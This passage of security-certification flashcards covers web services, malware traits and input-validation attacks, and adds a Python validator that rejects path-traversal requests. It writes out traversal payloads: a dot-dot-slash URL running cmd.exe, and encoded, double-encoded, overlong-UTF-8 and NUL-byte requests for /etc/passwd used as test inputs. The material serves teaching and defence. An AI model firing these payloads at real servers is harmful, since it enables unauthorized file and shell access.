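        "WHERE d.dept_id IS NULL"
    ).fetchone()[0]
    return results


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key:18} {value}")
```

The orphan-row query at the end is the kind of check worth running against a database that was populated before the constraints existed, or that was loaded through a path (bulk import, a connection without the pragma) that bypassed them: declared constraints protect future writes, not rows already present.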

85
Q

National Software Reference Library (NSRL)

A

The National Software Reference Library (NSRL), maintained by NIST, is a collection of digital signatures (file hashes) of known, traceable software applications. Investigators use it to recognize known files on seized systems so that a forensic examination can concentrate on the files that are not already accounted for.

86
Q

Software configuration management (SCM)

A

Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

87
Q

service-oriented architecture (SOA)

A

A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

88
Q

what is a mashup?

A

A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

89
Q

What is a WSDL?

A

The Web Services Description Language (WSDL) is the XML document that describes a web service's interface: the operations it offers, the format of the messages they exchange, and the endpoint and protocol binding used to reach them.

90
Q

What does a web service provide?

A

Web service provides the application functionality.

91
Q

What does UDDI provide?

A

Universal Description, Discovery, and Integration (UDDI) provides the registry mechanism through which web services are published and discovered.

92
Q

What is SOAP?

A

SOAP allows for the exchange of messages between a requester and provider of a web service.

93
Q

What’s the importance of the “%20” characters?

A

The characters "%20" are the URL encoding of a space. Attackers commonly use URL encoding in so-called URL encoding attacks: representing a character in an encoded form can slip it past web server filtering rules that only look for the literal character, which can result in the attacker gaining unauthorized access to components of the web server. The characters "../" can be used in similar web server requests to instruct the web server software to traverse into directories that should be inaccessible.

94
Q

Why is client-side validation not enough on its own?

A

Client-side validation checks that the data entered into a form contains valid values before it is sent to the web server for processing.

The web server must not rely on client-side validation alone, because the client is under the attacker's control and the checks can be disabled or bypassed; the server must carry out its own validation to ensure that the input values are not illegal or potentially malicious.

95
Q

Heuristic (behavior) malware detection

A

Heuristic detection and behavior blocking is considered proactive and can detect new malware, sometimes called “zero day” attacks.

96
Q

Signature-based (malware )detection

A

Signature-based detection can only recognize malware for which a signature already exists, so it cannot detect new (previously unseen) malware until a signature for it is published.

97
Q

What are the servers that send the bots instructions and manage the botnets called?

A

The servers that send the bots instructions and manage the botnets are commonly referred to as command-and-control (C&C) servers, and they can control thousands or millions of computers at one time.

98
Q

What are the 6 main elements of malware (not all required to be in place)?

A

  • Insertion: installs itself on the victim's system
  • Avoidance: uses methods to avoid being detected
  • Eradication: removes itself after the payload has been executed
  • Replication: makes copies of itself and spreads to other victims
  • Trigger: uses an event to initiate its payload execution
  • Payload: carries out its function (that is, deletes files, installs a back door,
99
Q

What’s a stealth virus?

A

A stealth virus hides the modifications it has made to files or boot records. This can be accomplished by monitoring system functions used to read files or sectors and forging the results. This means that when an antimalware program attempts to read an infected file or sector, the original uninfected form will be presented instead of the actual infected form.

The virus can hide itself by masking the size of the file it is hidden in or actually move itself temporarily to another location while an antimalware program is carrying out its scanning process. So a stealth virus is a virus that hides its tracks after infecting a system.

Once the system is infected, the virus can make modifications to make the computer appear the same as before. The virus can show the original file size of a file it infected instead of the new, larger size to try to trick the antimalware software into thinking no changes have been made.

100
Q

What is Parameter validation?

A

Parameter validation is where the values being received by the application (form fields, URL parameters, cookies, hidden fields) are checked to be within defined limits before the server application processes them. The main difference between parameter validation and input validation is whether the application was expecting the user to supply the value, as opposed to a value such as an environment variable or hidden field that the application itself defined but that the client can still tamper with before sending.

101
Q

What is Path or directory traversal (Input Validation)?

A

Path or directory traversal, also known as the "dot dot slash" attack, uses "../" sequences to back up into directories that were not supposed to be accessible from the web. At a command prompt, ".." refers to the parent directory (for example, "cd .."). If a web server's default directory is c:\inetpub\www, a URL requesting http://www.website.com/scripts/../../../../../windows/system32/cmd.exe?/c+dir+c:\ would back up several directories to make sure it has reached the root of the drive, then change into the operating system directory (windows\system32) and run cmd.exe to list the contents of the C: drive. Access to the command shell gives the attacker extensive control of the host.

102
Q

What is Input Validation?

A

Input validation is checking that data received by the application (URLs, form fields, headers, and other request components) conforms to what the application expects before it is processed. On web servers this is usually tied to coded validation rules within the web server software. Attackers have figured out how to bypass some of these coded validation rules, for example by sending alternative encodings of the characters the rules look for.

103
Q

What is Unicode encoding?

A

Unicode is an industry-standard mechanism for representing the entire range of over 100,000 textual characters in the world in one coding format. Web servers support Unicode so that they can serve different character sets (for different languages), and at one time many web server products accepted it by default. So even if we told our systems not to allow the "../" directory traversal request mentioned previously, an attacker using Unicode could make the same request without a literal "/" by sending an alternative, overlong UTF-8 encoding of that character, such as %c0%af for "/" or %c1%9c for "\". Such a request may slip through the filter unnoticed and be processed, because the filter compares the request before the server decodes it.

104
Q

What is URL encoding?

A

URL encoding: ever notice a space that appears as "%20" in a URL in a web browser? The "%20" represents the space because spaces are not allowed characters in a URL. Much like the attacks using Unicode characters, attackers found that they could bypass filtering techniques and make requests by representing characters differently, including encoding a character twice (for example "%252e" for ".") when the server decodes the request more than once.
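
Cards 93 and 101 through 104 describe the same family of bypasses, and the defence is not to pattern-match "../" but to decode once, refuse anything that still looks encoded, canonicalise, and then check containment. The following is an added example written for this page (not from the original flashcards or from any web server's code) of such a server-side check in Python; the names `resolve_web_path`, `RejectedPath`, `check` and `sample_results`, the document root created in a temporary directory, and the request paths are all this example's own.

```python
import os
import tempfile
from urllib.parse import unquote


class RejectedPath(ValueError):
    """Raised with a human-readable reason when a request path fails validation."""


def resolve_web_path(raw_path: str, base_dir: str) -> str:
    """Map a URL path from the request line onto a file under base_dir, or raise RejectedPath.

    Order matters: decode once (strictly), check for smuggled encodings, then do the
    containment check on the fully canonicalised path instead of searching for '../'.
    """
    # 1. Percent-decode exactly once. errors='strict' makes overlong or otherwise invalid
    #    UTF-8 such as %c0%af (an overlong encoding of '/') raise instead of silently mapping.
    try:
        decoded = unquote(raw_path, encoding="utf-8", errors="strict")
    except UnicodeDecodeError:
        raise RejectedPath("invalid or overlong UTF-8 in percent-encoding")
    # 2. If decoding again changes the string, the client sent a second layer (%252e -> %2e -> '.').
    if unquote(decoded, encoding="utf-8", errors="replace") != decoded:
        raise RejectedPath("double-encoded path")
    # 3. Characters that change meaning for the OS layer but never belong in a URL path.
    if "\x00" in decoded:
        raise RejectedPath("NUL byte")
    if "\\" in decoded:
        raise RejectedPath("backslash path separator")
    # 4. Canonicalise and enforce containment. realpath also resolves symlinks, so a link
    #    inside the web root cannot point outside it.
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, full]) != base:
        raise RejectedPath("path escapes the document root")
    return full


def check(raw_path: str, base_dir: str) -> str:
    """Demo helper: 'ok' or the rejection reason, so outcomes can be compared at a glance."""
    try:
        resolve_web_path(raw_path, base_dir)
        return "ok"
    except RejectedPath as exc:
        return str(exc)


def sample_results(base_dir: str = None) -> dict:
    """Run constructed request paths through the resolver against a throwaway document root."""
    if base_dir is None:
        base_dir = tempfile.mkdtemp()
    requests = [
        "/images/logo.png",                                    # legitimate
        "/docs/file%20name.txt",                               # legitimate use of %20
        "/scripts/../../../../../windows/system32/cmd.exe",    # plain dot-dot-slash (card 101)
        "/%2e%2e/%2e%2e/etc/passwd",                           # URL-encoded dots (card 104)
        "/%252e%252e/etc/passwd",                              # double encoding
        "/%c0%af%c0%afetc/passwd",                             # overlong UTF-8 for '/' (card 103)
        "/a%00.txt",                                           # NUL truncation
        "/..\\..\\windows\\system32",                          # backslash separators
    ]
    return {raw: check(raw, base_dir) for raw in requests}


if __name__ == "__main__":
    for raw, outcome in sample_results().items():
        print(f"{raw!r:55} -> {outcome}")
```

Note that the traversal attempts are caught by the containment test in step 4, not by looking for "../": after `realpath` the dots are gone and the only question left is whether the result is still under the document root. Steps 1 to 3 exist because the operating system layer would otherwise see a different string from the one the filter saw, which is exactly the gap the Unicode and double-encoding tricks exploit.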

105
Q

What is Client Side Validation?

A

Client-side validation is when the input validation is done at the client, before the data is even sent to the server to process. If you have missed a field in a web form and, before clicking Submit, you immediately receive a message informing you that you have forgotten to fill in one of the fields, you have experienced client-side validation. Client-side validation is a good idea because it avoids incomplete requests being sent to the server and the server having to send back an error message to the user. It is a usability feature, not a security control: an attacker can disable the script or bypass the browser entirely, so the server must repeat the validation itself.

106
Q

What are Specific Threats for Web Environments ?

A
The most common types of vulnerabilities, threats, and complexities in web environments are the following, each of which is explored in turn:
  • Administrative interfaces
  • Authentication and access control
  • Input validation
  • Parameter validation
  • Session management